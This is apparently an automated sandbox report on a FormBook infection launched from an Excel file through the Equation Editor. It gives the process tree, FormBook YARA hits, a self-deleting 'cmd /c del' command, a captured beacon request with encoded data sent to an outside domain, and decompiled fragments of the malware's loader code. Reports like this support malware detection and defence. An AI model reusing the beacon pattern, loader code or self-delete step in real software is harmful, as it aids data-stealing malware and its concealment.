                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.2249169199.59.242.15380C:\Windows\explorer.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:12:42.417220116 CEST763OUTGET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1
                                                                                                                                                  Host: www.globaltradeview.com
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii:
                                                                                                                                                  Jul 22, 2021 17:12:42.543577909 CEST764INHTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:12:42 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MbNuOLmRpArocewFjtxe7j2nPv6GrPLtnlRMXMGv4/ASgKgZyMsXkP3Kus6pnSH9t0pY8PHRr9ik6JxP5yOyvQ==
                                                                                                                                                  Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 62 4e 75 4f 4c 6d 52 70 41 72 6f 63 65 77 46 6a 74 78 65 37 6a 32 6e 50 76 36 47 72 50 4c 74 6e 6c 52 4d 58 4d 47 76 34 2f 41 53 67 4b 67 5a 79 4d 73 58 6b 50 33 4b 75 73 36 70 6e 53 48 39 74 30 70 59 38 50 48 52 72 39 69 6b 36 4a 78 50 35 79 4f 79 76 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                                                                                                  Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MbNuOLmRpArocewFjtxe7j2nPv6GrPLtnlRMXMGv4/ASgKgZyMsXkP3Kus6pnSH9t0pY8PHRr9ik6JxP5yOyvQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
                                                                                                                                                  Jul 22, 2021 17:12:42.543642044 CEST765INData Raw: 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63
                                                                                                                                                  Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
                                                                                                                                                  Jul 22, 2021 17:12:42.543684959 CEST767INData Raw: 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 6d 65 6e 74 73
                                                                                                                                                  Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body||DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
                                                                                                                                                  Jul 22, 2021 17:12:42.543699980 CEST767INData Raw: 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 3a 27 27 29
                                                                                                                                                  Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+
                                                                                                                                                  Jul 22, 2021 17:12:42.543711901 CEST767INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 2752 Parent PID: 584

                                                                                                                                                  General

                                                                                                                                                  Start time:17:10:48
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x13f620000
                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: EQNEDT32.EXE PID: 2368 Parent PID: 584

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:09
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:543304 bytes
                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: vbc.exe PID: 2592 Parent PID: 2368

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:14
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x840000
                                                                                                                                                  File size:721408 bytes
                                                                                                                                                  MD5 hash:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 32%, ReversingLabs
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: vbc.exe PID: 856 Parent PID: 2592

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:37
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                  Imagebase:0x840000
                                                                                                                                                  File size:721408 bytes
                                                                                                                                                  MD5 hash:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: explorer.exe PID: 1388 Parent PID: 856

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:38
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                  Imagebase:0xffca0000
                                                                                                                                                  File size:3229696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: wlanext.exe PID: 1428 Parent PID: 1388

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:51
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                  Imagebase:0xbe0000
                                                                                                                                                  File size:77312 bytes
                                                                                                                                                  MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: cmd.exe PID: 2544 Parent PID: 1428

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:56
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x4a6c0000
                                                                                                                                                  File size:302592 bytes
                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >

                                                                                                                                                    Analysis Process: vbc.exe PID: 856 Parent PID: 2592 vbc.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00418222, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: 9A$!:A$b=A$b=A
                                                                                                                                                    • API String ID: 2738559852-2349363835
                                                                                                                                                    • Opcode ID: b394143b222f7462b798372a2dce86ca23a2a6af17bed1276118a43d14d65779
                                                                                                                                                    • Instruction ID: b3e9ec29cccaf7c3bbbf06ff514fb2ee608965d537aa7c6c7265ebdbd010425a
                                                                                                                                                    • Opcode Fuzzy Hash: b394143b222f7462b798372a2dce86ca23a2a6af17bed1276118a43d14d65779
                                                                                                                                                    • Instruction Fuzzy Hash: AF11C0B6200108AFCB14DFA9D880DEB77A9AF8C354B158249FA1DA3241C630E8518BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc48;
				E00418DD0(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}





                                                                                                                                                    0x00418283
                                                                                                                                                    0x0041828f
                                                                                                                                                    0x00418297
                                                                                                                                                    0x0041829c
                                                                                                                                                    0x004182a2
                                                                                                                                                    0x004182bd
                                                                                                                                                    0x004182c5
                                                                                                                                                    0x004182c9

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:A$b=A$b=A
                                                                                                                                                    • API String ID: 2738559852-704622139
                                                                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                    • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                    • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041827B, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 23%
                                                                                                                                                    			E0041827B(void* __eax, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t21;
				intOrPtr* _t32;
				void* _t34;

				asm("pushfd");
				_t16 = _a4;
				_t32 = _a4 + 0xc48;
				E00418DD0(_t16, _t32,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t5 =  &_a40; // 0x413a21
				_t7 =  &_a32; // 0x413d62
				_t13 =  &_a8; // 0x413d62
				_t21 =  *((intOrPtr*)( *_t32))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, __esi, _t34); // executed
				return _t21;
			}






                                                                                                                                                    0x0041827d
                                                                                                                                                    0x00418283
                                                                                                                                                    0x0041828f
                                                                                                                                                    0x00418297
                                                                                                                                                    0x0041829c
                                                                                                                                                    0x004182a2
                                                                                                                                                    0x004182bd
                                                                                                                                                    0x004182c5
                                                                                                                                                    0x004182c9

                                                                                                                                                    APIs
                                                                                                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID: !:A$b=A$b=A
                                                                                                                                                    • API String ID: 2738559852-704622139
                                                                                                                                                    • Opcode ID: d278293a72e928245ba5d1c4965b2a26c6673b4345e7bcde11c86906ea445a02
                                                                                                                                                    • Instruction ID: 88b1141c54382e50f69abbad5d8ada372f13132d47ed4204a516990edf475160
                                                                                                                                                    • Opcode Fuzzy Hash: d278293a72e928245ba5d1c4965b2a26c6673b4345e7bcde11c86906ea445a02
                                                                                                                                                    • Instruction Fuzzy Hash: FAF01DB2200049AFCB05DFA9D880CEB7BA9EF8C354B05874DF95D93205C634E855CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF80(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						_push(0);
						_push( &_v12);
						E0041B200( &_v12);
						_t32 = _t32 + 8;
					}
					_t18 = E00419310(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                    0x00409b4c
                                                                                                                                                    0x00409b4f
                                                                                                                                                    0x00409b54
                                                                                                                                                    0x00409b59
                                                                                                                                                    0x00409b63
                                                                                                                                                    0x00409b68
                                                                                                                                                    0x00409b6b
                                                                                                                                                    0x00409b6d
                                                                                                                                                    0x00409b72
                                                                                                                                                    0x00409b74
                                                                                                                                                    0x00409b75
                                                                                                                                                    0x00409b7a
                                                                                                                                                    0x00409b7a
                                                                                                                                                    0x00409b81
                                                                                                                                                    0x00409b89
                                                                                                                                                    0x00409b8c
                                                                                                                                                    0x00409b8e
                                                                                                                                                    0x00409ba2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00409ba4
                                                                                                                                                    0x00409baa
                                                                                                                                                    0x00409b5e
                                                                                                                                                    0x00409b5e
                                                                                                                                                    0x00409b5e

                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
